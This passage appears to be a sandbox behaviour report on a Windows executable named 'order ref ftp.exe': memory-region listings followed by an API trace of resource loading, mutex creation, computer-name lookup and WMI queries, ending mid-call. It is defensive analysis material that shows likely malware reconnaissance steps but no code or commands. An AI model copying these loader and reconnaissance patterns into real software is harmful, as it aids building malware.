"\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 948 start_va = 0x7e40000 end_va = 0x7e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000007e40000" filename = "" Region: id = 949 start_va = 0x7e80000 end_va = 0x7f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000007e80000" filename = "" Region: id = 950 start_va = 0x7f524000 end_va = 0x7f526fff entry_point = 0x0 region_type = private name = "private_0x000000007f524000" filename = "" Region: id = 960 start_va = 0x2e60000 end_va = 0x2e64fff entry_point = 0x2e60000 region_type = mapped_file name = "wmiutils.dll.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmiutils.dll.mui") Region: id = 961 start_va = 0x5370000 end_va = 0x537ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 962 start_va = 0x5380000 end_va = 0x5380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005380000" filename = "" Region: id = 963 start_va = 0x7e40000 end_va = 0x7ef7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e40000" filename = "" Region: id = 964 start_va = 0x5380000 end_va = 0x5383fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005380000" filename = "" Region: id = 965 start_va = 0x748f0000 end_va = 0x7490cfff entry_point = 0x748f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 966 start_va = 0x7f00000 end_va = 0x7f00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f00000" filename = "" Region: id = 967 start_va = 0x73120000 end_va = 0x73127fff entry_point = 0x73120000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 1213 start_va = 0x7f00000 end_va = 0x7f53fff entry_point = 0x7f00000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 1214 start_va = 0x7f60000 end_va = 0x7f63fff entry_point = 0x0 region_type = private name = "private_0x0000000007f60000" filename = "" Region: id = 1215 start_va = 0x73120000 end_va = 0x73125fff entry_point = 0x73120000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 1286 start_va = 0x71a70000 end_va = 0x71b62fff entry_point = 0x71a70000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\996056d1eff1504e6304b70484c24115\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuration\\996056d1eff1504e6304b70484c24115\\system.configuration.ni.dll") Region: id = 1287 start_va = 0x71530000 end_va = 0x71a6afff entry_point = 0x71530000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\58c73277ac94d5bd748ccafea8b1af02\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\58c73277ac94d5bd748ccafea8b1af02\\system.xml.ni.dll") Region: id = 1288 start_va = 0x1020000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1289 start_va = 0x1030000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1290 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1291 start_va = 0x51c0000 end_va = 0x52bffff entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 1292 start_va = 0x71450000 end_va = 0x71472fff entry_point = 0x71450000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1293 start_va = 0x71480000 end_va = 0x71523fff entry_point = 0x71480000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1294 start_va = 0x7f6c6000 end_va = 0x7f6c8fff entry_point = 0x0 region_type = private name = "private_0x000000007f6c6000" filename = "" Region: id = 1295 start_va = 0x71430000 end_va = 0x71440fff entry_point = 0x71430000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1296 start_va = 0x713e0000 end_va = 0x7142dfff entry_point = 0x713e0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1297 start_va = 0x1040000 end_va = 0x105ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 1298 start_va = 0x7cb0000 end_va = 0x7d8efff entry_point = 0x7cb0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1299 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 1300 start_va = 0x11a0000 end_va = 0x11dffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1301 start_va = 0x7f70000 end_va = 0x806ffff entry_point = 0x0 region_type = private name = "private_0x0000000007f70000" filename = "" Region: id = 1302 start_va = 0x8070000 end_va = 0x816ffff entry_point = 0x0 region_type = private name = "private_0x0000000008070000" filename = "" Region: id = 1303 start_va = 0x71330000 end_va = 0x713d6fff entry_point = 0x71330000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1304 start_va = 0x7f524000 end_va = 0x7f526fff entry_point = 0x0 region_type = private name = "private_0x000000007f524000" filename = "" Region: id = 1305 start_va = 0x7f527000 end_va = 0x7f529fff entry_point = 0x0 region_type = private name = "private_0x000000007f527000" filename = "" Region: id = 1306 start_va = 0x71310000 end_va = 0x71320fff entry_point = 0x71310000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1307 start_va = 0x712e0000 end_va = 0x7130ffff entry_point = 0x712e0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1308 start_va = 0x73110000 end_va = 0x73117fff entry_point = 0x73110000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1309 start_va = 0x712c0000 end_va = 0x712d2fff entry_point = 0x712c0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1310 start_va = 0x712a0000 end_va = 0x712b3fff entry_point = 0x712a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1311 start_va = 0x11e0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 1312 start_va = 0x7d90000 end_va = 0x7dcffff entry_point = 0x0 region_type = private name = "private_0x0000000007d90000" filename = "" Region: id = 1313 start_va = 0x8170000 end_va = 0x826ffff entry_point = 0x0 region_type = private name = "private_0x0000000008170000" filename = "" Region: id = 1314 start_va = 0x8270000 end_va = 0x836ffff entry_point = 0x0 region_type = private name = "private_0x0000000008270000" filename = "" Region: id = 1315 start_va = 0x7f51e000 end_va = 0x7f520fff entry_point = 0x0 region_type = private name = "private_0x000000007f51e000" filename = "" Region: id = 1316 start_va = 0x7f521000 end_va = 0x7f523fff entry_point = 0x0 region_type = private name = "private_0x000000007f521000" filename = "" Region: id = 1317 start_va = 0x71210000 end_va = 0x71293fff entry_point = 0x71210000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1318 start_va = 0x71200000 end_va = 0x71207fff entry_point = 0x71200000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1319 start_va = 0x711b0000 end_va = 0x711f5fff entry_point = 0x711b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1320 start_va = 0x8370000 end_va = 0x83affff entry_point = 0x0 region_type = private name = "private_0x0000000008370000" filename = "" Region: id = 1321 start_va = 0x83b0000 end_va = 0x84affff entry_point = 0x0 region_type = private name = "private_0x00000000083b0000" filename = "" Region: id = 1322 start_va = 0x7f51b000 end_va = 0x7f51dfff entry_point = 0x0 region_type = private name = "private_0x000000007f51b000" filename = "" Thread: id = 1 os_tid = 0xfd0 [0045.579] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0045.975] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", nBufferLength=0x105, lpBuffer=0xf2e9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", lpFilePart=0x0) returned 0x2f [0045.975] GetLastError () returned 0x2 [0045.979] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", nBufferLength=0x105, lpBuffer=0xf2e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", lpFilePart=0x0) returned 0x2f [0045.979] GetLastError () returned 0x2 [0045.981] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x105, lpBuffer=0xf2e944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x0) returned 0x1e [0045.981] GetLastError () returned 0x2 [0045.985] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x105, lpBuffer=0xf2e9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x0) returned 0x1e [0045.985] GetLastError () returned 0x2 [0045.985] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x105, lpBuffer=0xf2e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x0) returned 0x1e [0045.985] GetLastError () returned 0x2 [0045.991] GetVersionExW (in: lpVersionInformation=0x1271228*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1271228*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0045.991] GetLastError () returned 0x2 [0045.992] GetVersionExW (in: lpVersionInformation=0x1271228*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1271228*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0045.992] GetLastError () returned 0x2 [0046.945] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x1271d60, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.945] GetLastError () returned 0xcb [0047.919] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", nBufferLength=0x105, lpBuffer=0xf2eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", lpFilePart=0x0) returned 0x2f [0047.919] GetLastError () returned 0x0 [0048.035] LoadLibraryW (lpLibFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe") returned 0xd10000 [0048.055] EnumResourceTypesW (hModule=0xd10000, lpEnumFunc=0x2e707a2, lParam=0x0) returned 1 [0048.067] EnumResourceNamesW (hModule=0xd10000, lpType="RCDATA", lpEnumFunc=0x2e708d2, lParam=0x0) returned 1 [0048.173] lstrlenW (lpString="䅁") returned 1 [0048.188] GetModuleFileNameW (in: hModule=0xd10000, lpFilename=0x1271e10, nSize=0xff | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.exe")) returned 0x2f [0048.189] lstrlenW (lpString="0") returned 1 [0048.189] RtlMoveMemory (in: Destination=0x1271e10, Source=0x127b3c8, Length=0x4 | out: Destination=0x1271e10) [0048.189] lstrlenW (lpString="RCDATA") returned 6 [0048.189] RtlMoveMemory (in: Destination=0x1271e10, Source=0x127b0f8, Length=0xe | out: Destination=0x1271e10) [0048.192] FindResourceW (hModule=0xd10000, lpName="0", lpType="RCDATA") returned 0xd9c0b8 [0048.194] SizeofResource (hModule=0xd10000, hResInfo=0xd9c0b8) returned 0x530 [0048.195] LoadResource (hModule=0xd10000, hResInfo=0xd9c0b8) returned 0xd9c0fc [0048.197] LockResource (hResData=0xd9c0fc) returned 0xd9c0fc [0048.198] EnumResourceNamesW (hModule=0xd10000, lpType=0x10, lpEnumFunc=0x2e709ea, lParam=0x0) returned 1 [0048.198] GetModuleFileNameW (in: hModule=0xd10000, lpFilename=0x1271e10, nSize=0xff | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.exe")) returned 0x2f [0048.274] FindResourceW (hModule=0xd10000, lpName=0x1, lpType=0x10) returned 0xd9c0c8 [0048.274] SizeofResource (hModule=0xd10000, hResInfo=0xd9c0c8) returned 0x2ee [0048.274] LoadResource (hModule=0xd10000, hResInfo=0xd9c0c8) returned 0xd9c62c [0048.274] LockResource (hResData=0xd9c62c) returned 0xd9c62c [0048.275] EnumResourceNamesW (hModule=0xd10000, lpType=0x18, lpEnumFunc=0x2e70a1a, lParam=0x0) returned 1 [0048.275] GetModuleFileNameW (in: hModule=0xd10000, lpFilename=0x1271e10, nSize=0xff | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.exe")) returned 0x2f [0048.276] FindResourceW (hModule=0xd10000, lpName=0x1, lpType=0x18) returned 0xd9c0d8 [0048.276] SizeofResource (hModule=0xd10000, hResInfo=0xd9c0d8) returned 0x1ea [0048.276] LoadResource (hModule=0xd10000, hResInfo=0xd9c0d8) returned 0xd9c91c [0048.276] LockResource (hResData=0xd9c91c) returned 0xd9c91c [0048.279] FreeLibrary (hLibModule=0xd10000) returned 1 [0048.583] GetVersionExW (in: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0048.583] GetLastError () returned 0x0 [0048.611] BCryptGetFipsAlgorithmMode (in: pfEnabled=0xf2ef30 | out: pfEnabled=0xf2ef30) returned 0x0 [0058.899] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="35649757-3aea-40a9-acdb-9f15f973090c") returned 0x2c0 [0058.899] GetLastError () returned 0x0 [0058.900] CloseHandle (hObject=0x2c0) returned 1 [0058.900] GetLastError () returned 0x0 [0059.179] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1271d60 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0059.180] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIIHMN~1\\", lpszLongPath=0xf2eb6c, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\CIiHmnxMn6Ps\\") returned 0x16 [0059.180] GetLastError () returned 0x0 [0059.180] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0xf2eb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29 [0059.180] GetLastError () returned 0x0 [0059.398] GetComputerNameW (in: lpBuffer=0x1271d60, nSize=0xf2efac | out: lpBuffer="LHNIWSJ", nSize=0xf2efac) returned 1 [0059.409] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2c0 [0059.409] GetLastError () returned 0x0 [0059.410] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2b4 [0059.410] GetLastError () returned 0x0 [0059.419] SetEvent (hEvent=0x2b4) returned 1 [0059.419] GetLastError () returned 0x0 [0059.435] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xf2eef0*=0x2c0, lpdwindex=0xf2eca8 | out: lpdwindex=0xf2eca8) returned 0x0 [0060.390] CoGetContextToken (in: pToken=0xf2ed40 | out: pToken=0xf2ed40) returned 0x0 [0060.390] CoGetContextToken (in: pToken=0xf2ed00 | out: pToken=0xf2ed00) returned 0x0 [0060.390] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed7c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed78 | out: ppvObject=0xf2ed78*=0x1289cd8) returned 0x0 [0060.390] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.390] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.390] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380 [0060.390] GetLastError () returned 0x0 [0060.391] SetEvent (hEvent=0x2b4) returned 1 [0060.391] GetLastError () returned 0x0 [0060.391] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xf2e714*=0x380, lpdwindex=0xf2e4cc | out: lpdwindex=0xf2e4cc) returned 0x0 [0060.393] CoGetContextToken (in: pToken=0xf2e564 | out: pToken=0xf2e564) returned 0x0 [0060.393] CoGetContextToken (in: pToken=0xf2e524 | out: pToken=0xf2e524) returned 0x0 [0060.393] WbemDefPath:IUnknown:AddRef (This=0x128a058) returned 0x2 [0060.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x128a058, riid=0xf2e5a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2e59c | out: ppvObject=0xf2e59c*=0x128a058) returned 0x0 [0060.393] WbemDefPath:IUnknown:Release (This=0x128a058) returned 0x2 [0060.393] WbemDefPath:IUnknown:Release (This=0x128a058) returned 0x1 [0060.398] CoGetContextToken (in: pToken=0xf2e5e4 | out: pToken=0xf2e5e4) returned 0x0 [0060.398] CoGetContextToken (in: pToken=0xf2e5a4 | out: pToken=0xf2e5a4) returned 0x0 [0060.398] WbemDefPath:IUnknown:AddRef (This=0x128a058) returned 0x2 [0060.398] WbemDefPath:IUnknown:QueryInterface (in: This=0x128a058, riid=0xf2e620*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2e61c | out: ppvObject=0xf2e61c*=0x128a058) returned 0x0 [0060.398] WbemDefPath:IUnknown:Release (This=0x128a058) returned 0x2 [0060.398] WbemDefPath:IWbemPath:SetText (This=0x128a058, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0060.398] WbemDefPath:IUnknown:Release (This=0x128a058) returned 0x1 [0060.399] CoGetContextToken (in: pToken=0xf2edc0 | out: pToken=0xf2edc0) returned 0x0 [0060.399] CoGetContextToken (in: pToken=0xf2ed80 | out: pToken=0xf2ed80) returned 0x0 [0060.399] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.399] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edfc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edf8 | out: ppvObject=0xf2edf8*=0x1289cd8) returned 0x0 [0060.399] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.399] WbemDefPath:IWbemPath:SetText (This=0x1289cd8, uMode=0x4, pszPath="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0060.399] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.402] CoGetContextToken (in: pToken=0xf2edb0 | out: pToken=0xf2edb0) returned 0x0 [0060.402] CoGetContextToken (in: pToken=0xf2ed70 | out: pToken=0xf2ed70) returned 0x0 [0060.402] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.402] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edec*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ede8 | out: ppvObject=0xf2ede8*=0x1289cd8) returned 0x0 [0060.402] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.402] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1289cd8, puCount=0xf2ef64 | out: puCount=0xf2ef64*=0x2) returned 0x0 [0060.402] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.404] CoGetContextToken (in: pToken=0xf2eda0 | out: pToken=0xf2eda0) returned 0x0 [0060.404] CoGetContextToken (in: pToken=0xf2ed60 | out: pToken=0xf2ed60) returned 0x0 [0060.404] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.404] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2eddc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edd8 | out: ppvObject=0xf2edd8*=0x1289cd8) returned 0x0 [0060.404] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.404] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef60*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef60*=0x15, pszText=0x0) returned 0x0 [0060.404] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.404] CoGetContextToken (in: pToken=0xf2eda0 | out: pToken=0xf2eda0) returned 0x0 [0060.404] CoGetContextToken (in: pToken=0xf2ed60 | out: pToken=0xf2ed60) returned 0x0 [0060.405] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2eddc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edd8 | out: ppvObject=0xf2edd8*=0x1289cd8) returned 0x0 [0060.405] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.405] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef60*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef60*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0060.405] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.406] CoGetContextToken (in: pToken=0xf2ed94 | out: pToken=0xf2ed94) returned 0x0 [0060.406] CoGetContextToken (in: pToken=0xf2ed54 | out: pToken=0xf2ed54) returned 0x0 [0060.406] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edcc | out: ppvObject=0xf2edcc*=0x1289cd8) returned 0x0 [0060.406] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.406] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1289cd8, puCount=0xf2ef48 | out: puCount=0xf2ef48*=0x2) returned 0x0 [0060.406] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.406] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0060.406] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0060.406] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x1289cd8) returned 0x0 [0060.406] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.406] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef44*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef44*=0x15, pszText=0x0) returned 0x0 [0060.406] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.407] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0060.407] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0060.407] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.407] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x1289cd8) returned 0x0 [0060.407] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.407] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef44*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef44*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0060.407] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.414] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xf2ede0*=0x394, lpdwindex=0xf2ec3c | out: lpdwindex=0xf2ec3c) returned 0x0 [0064.597] CoGetContextToken (in: pToken=0xf2ee2c | out: pToken=0xf2ee2c) returned 0x0 [0064.597] CoGetContextToken (in: pToken=0xf2edd8 | out: pToken=0xf2edd8) returned 0x0 [0064.597] IUnknown:QueryInterface (in: This=0x126b548, 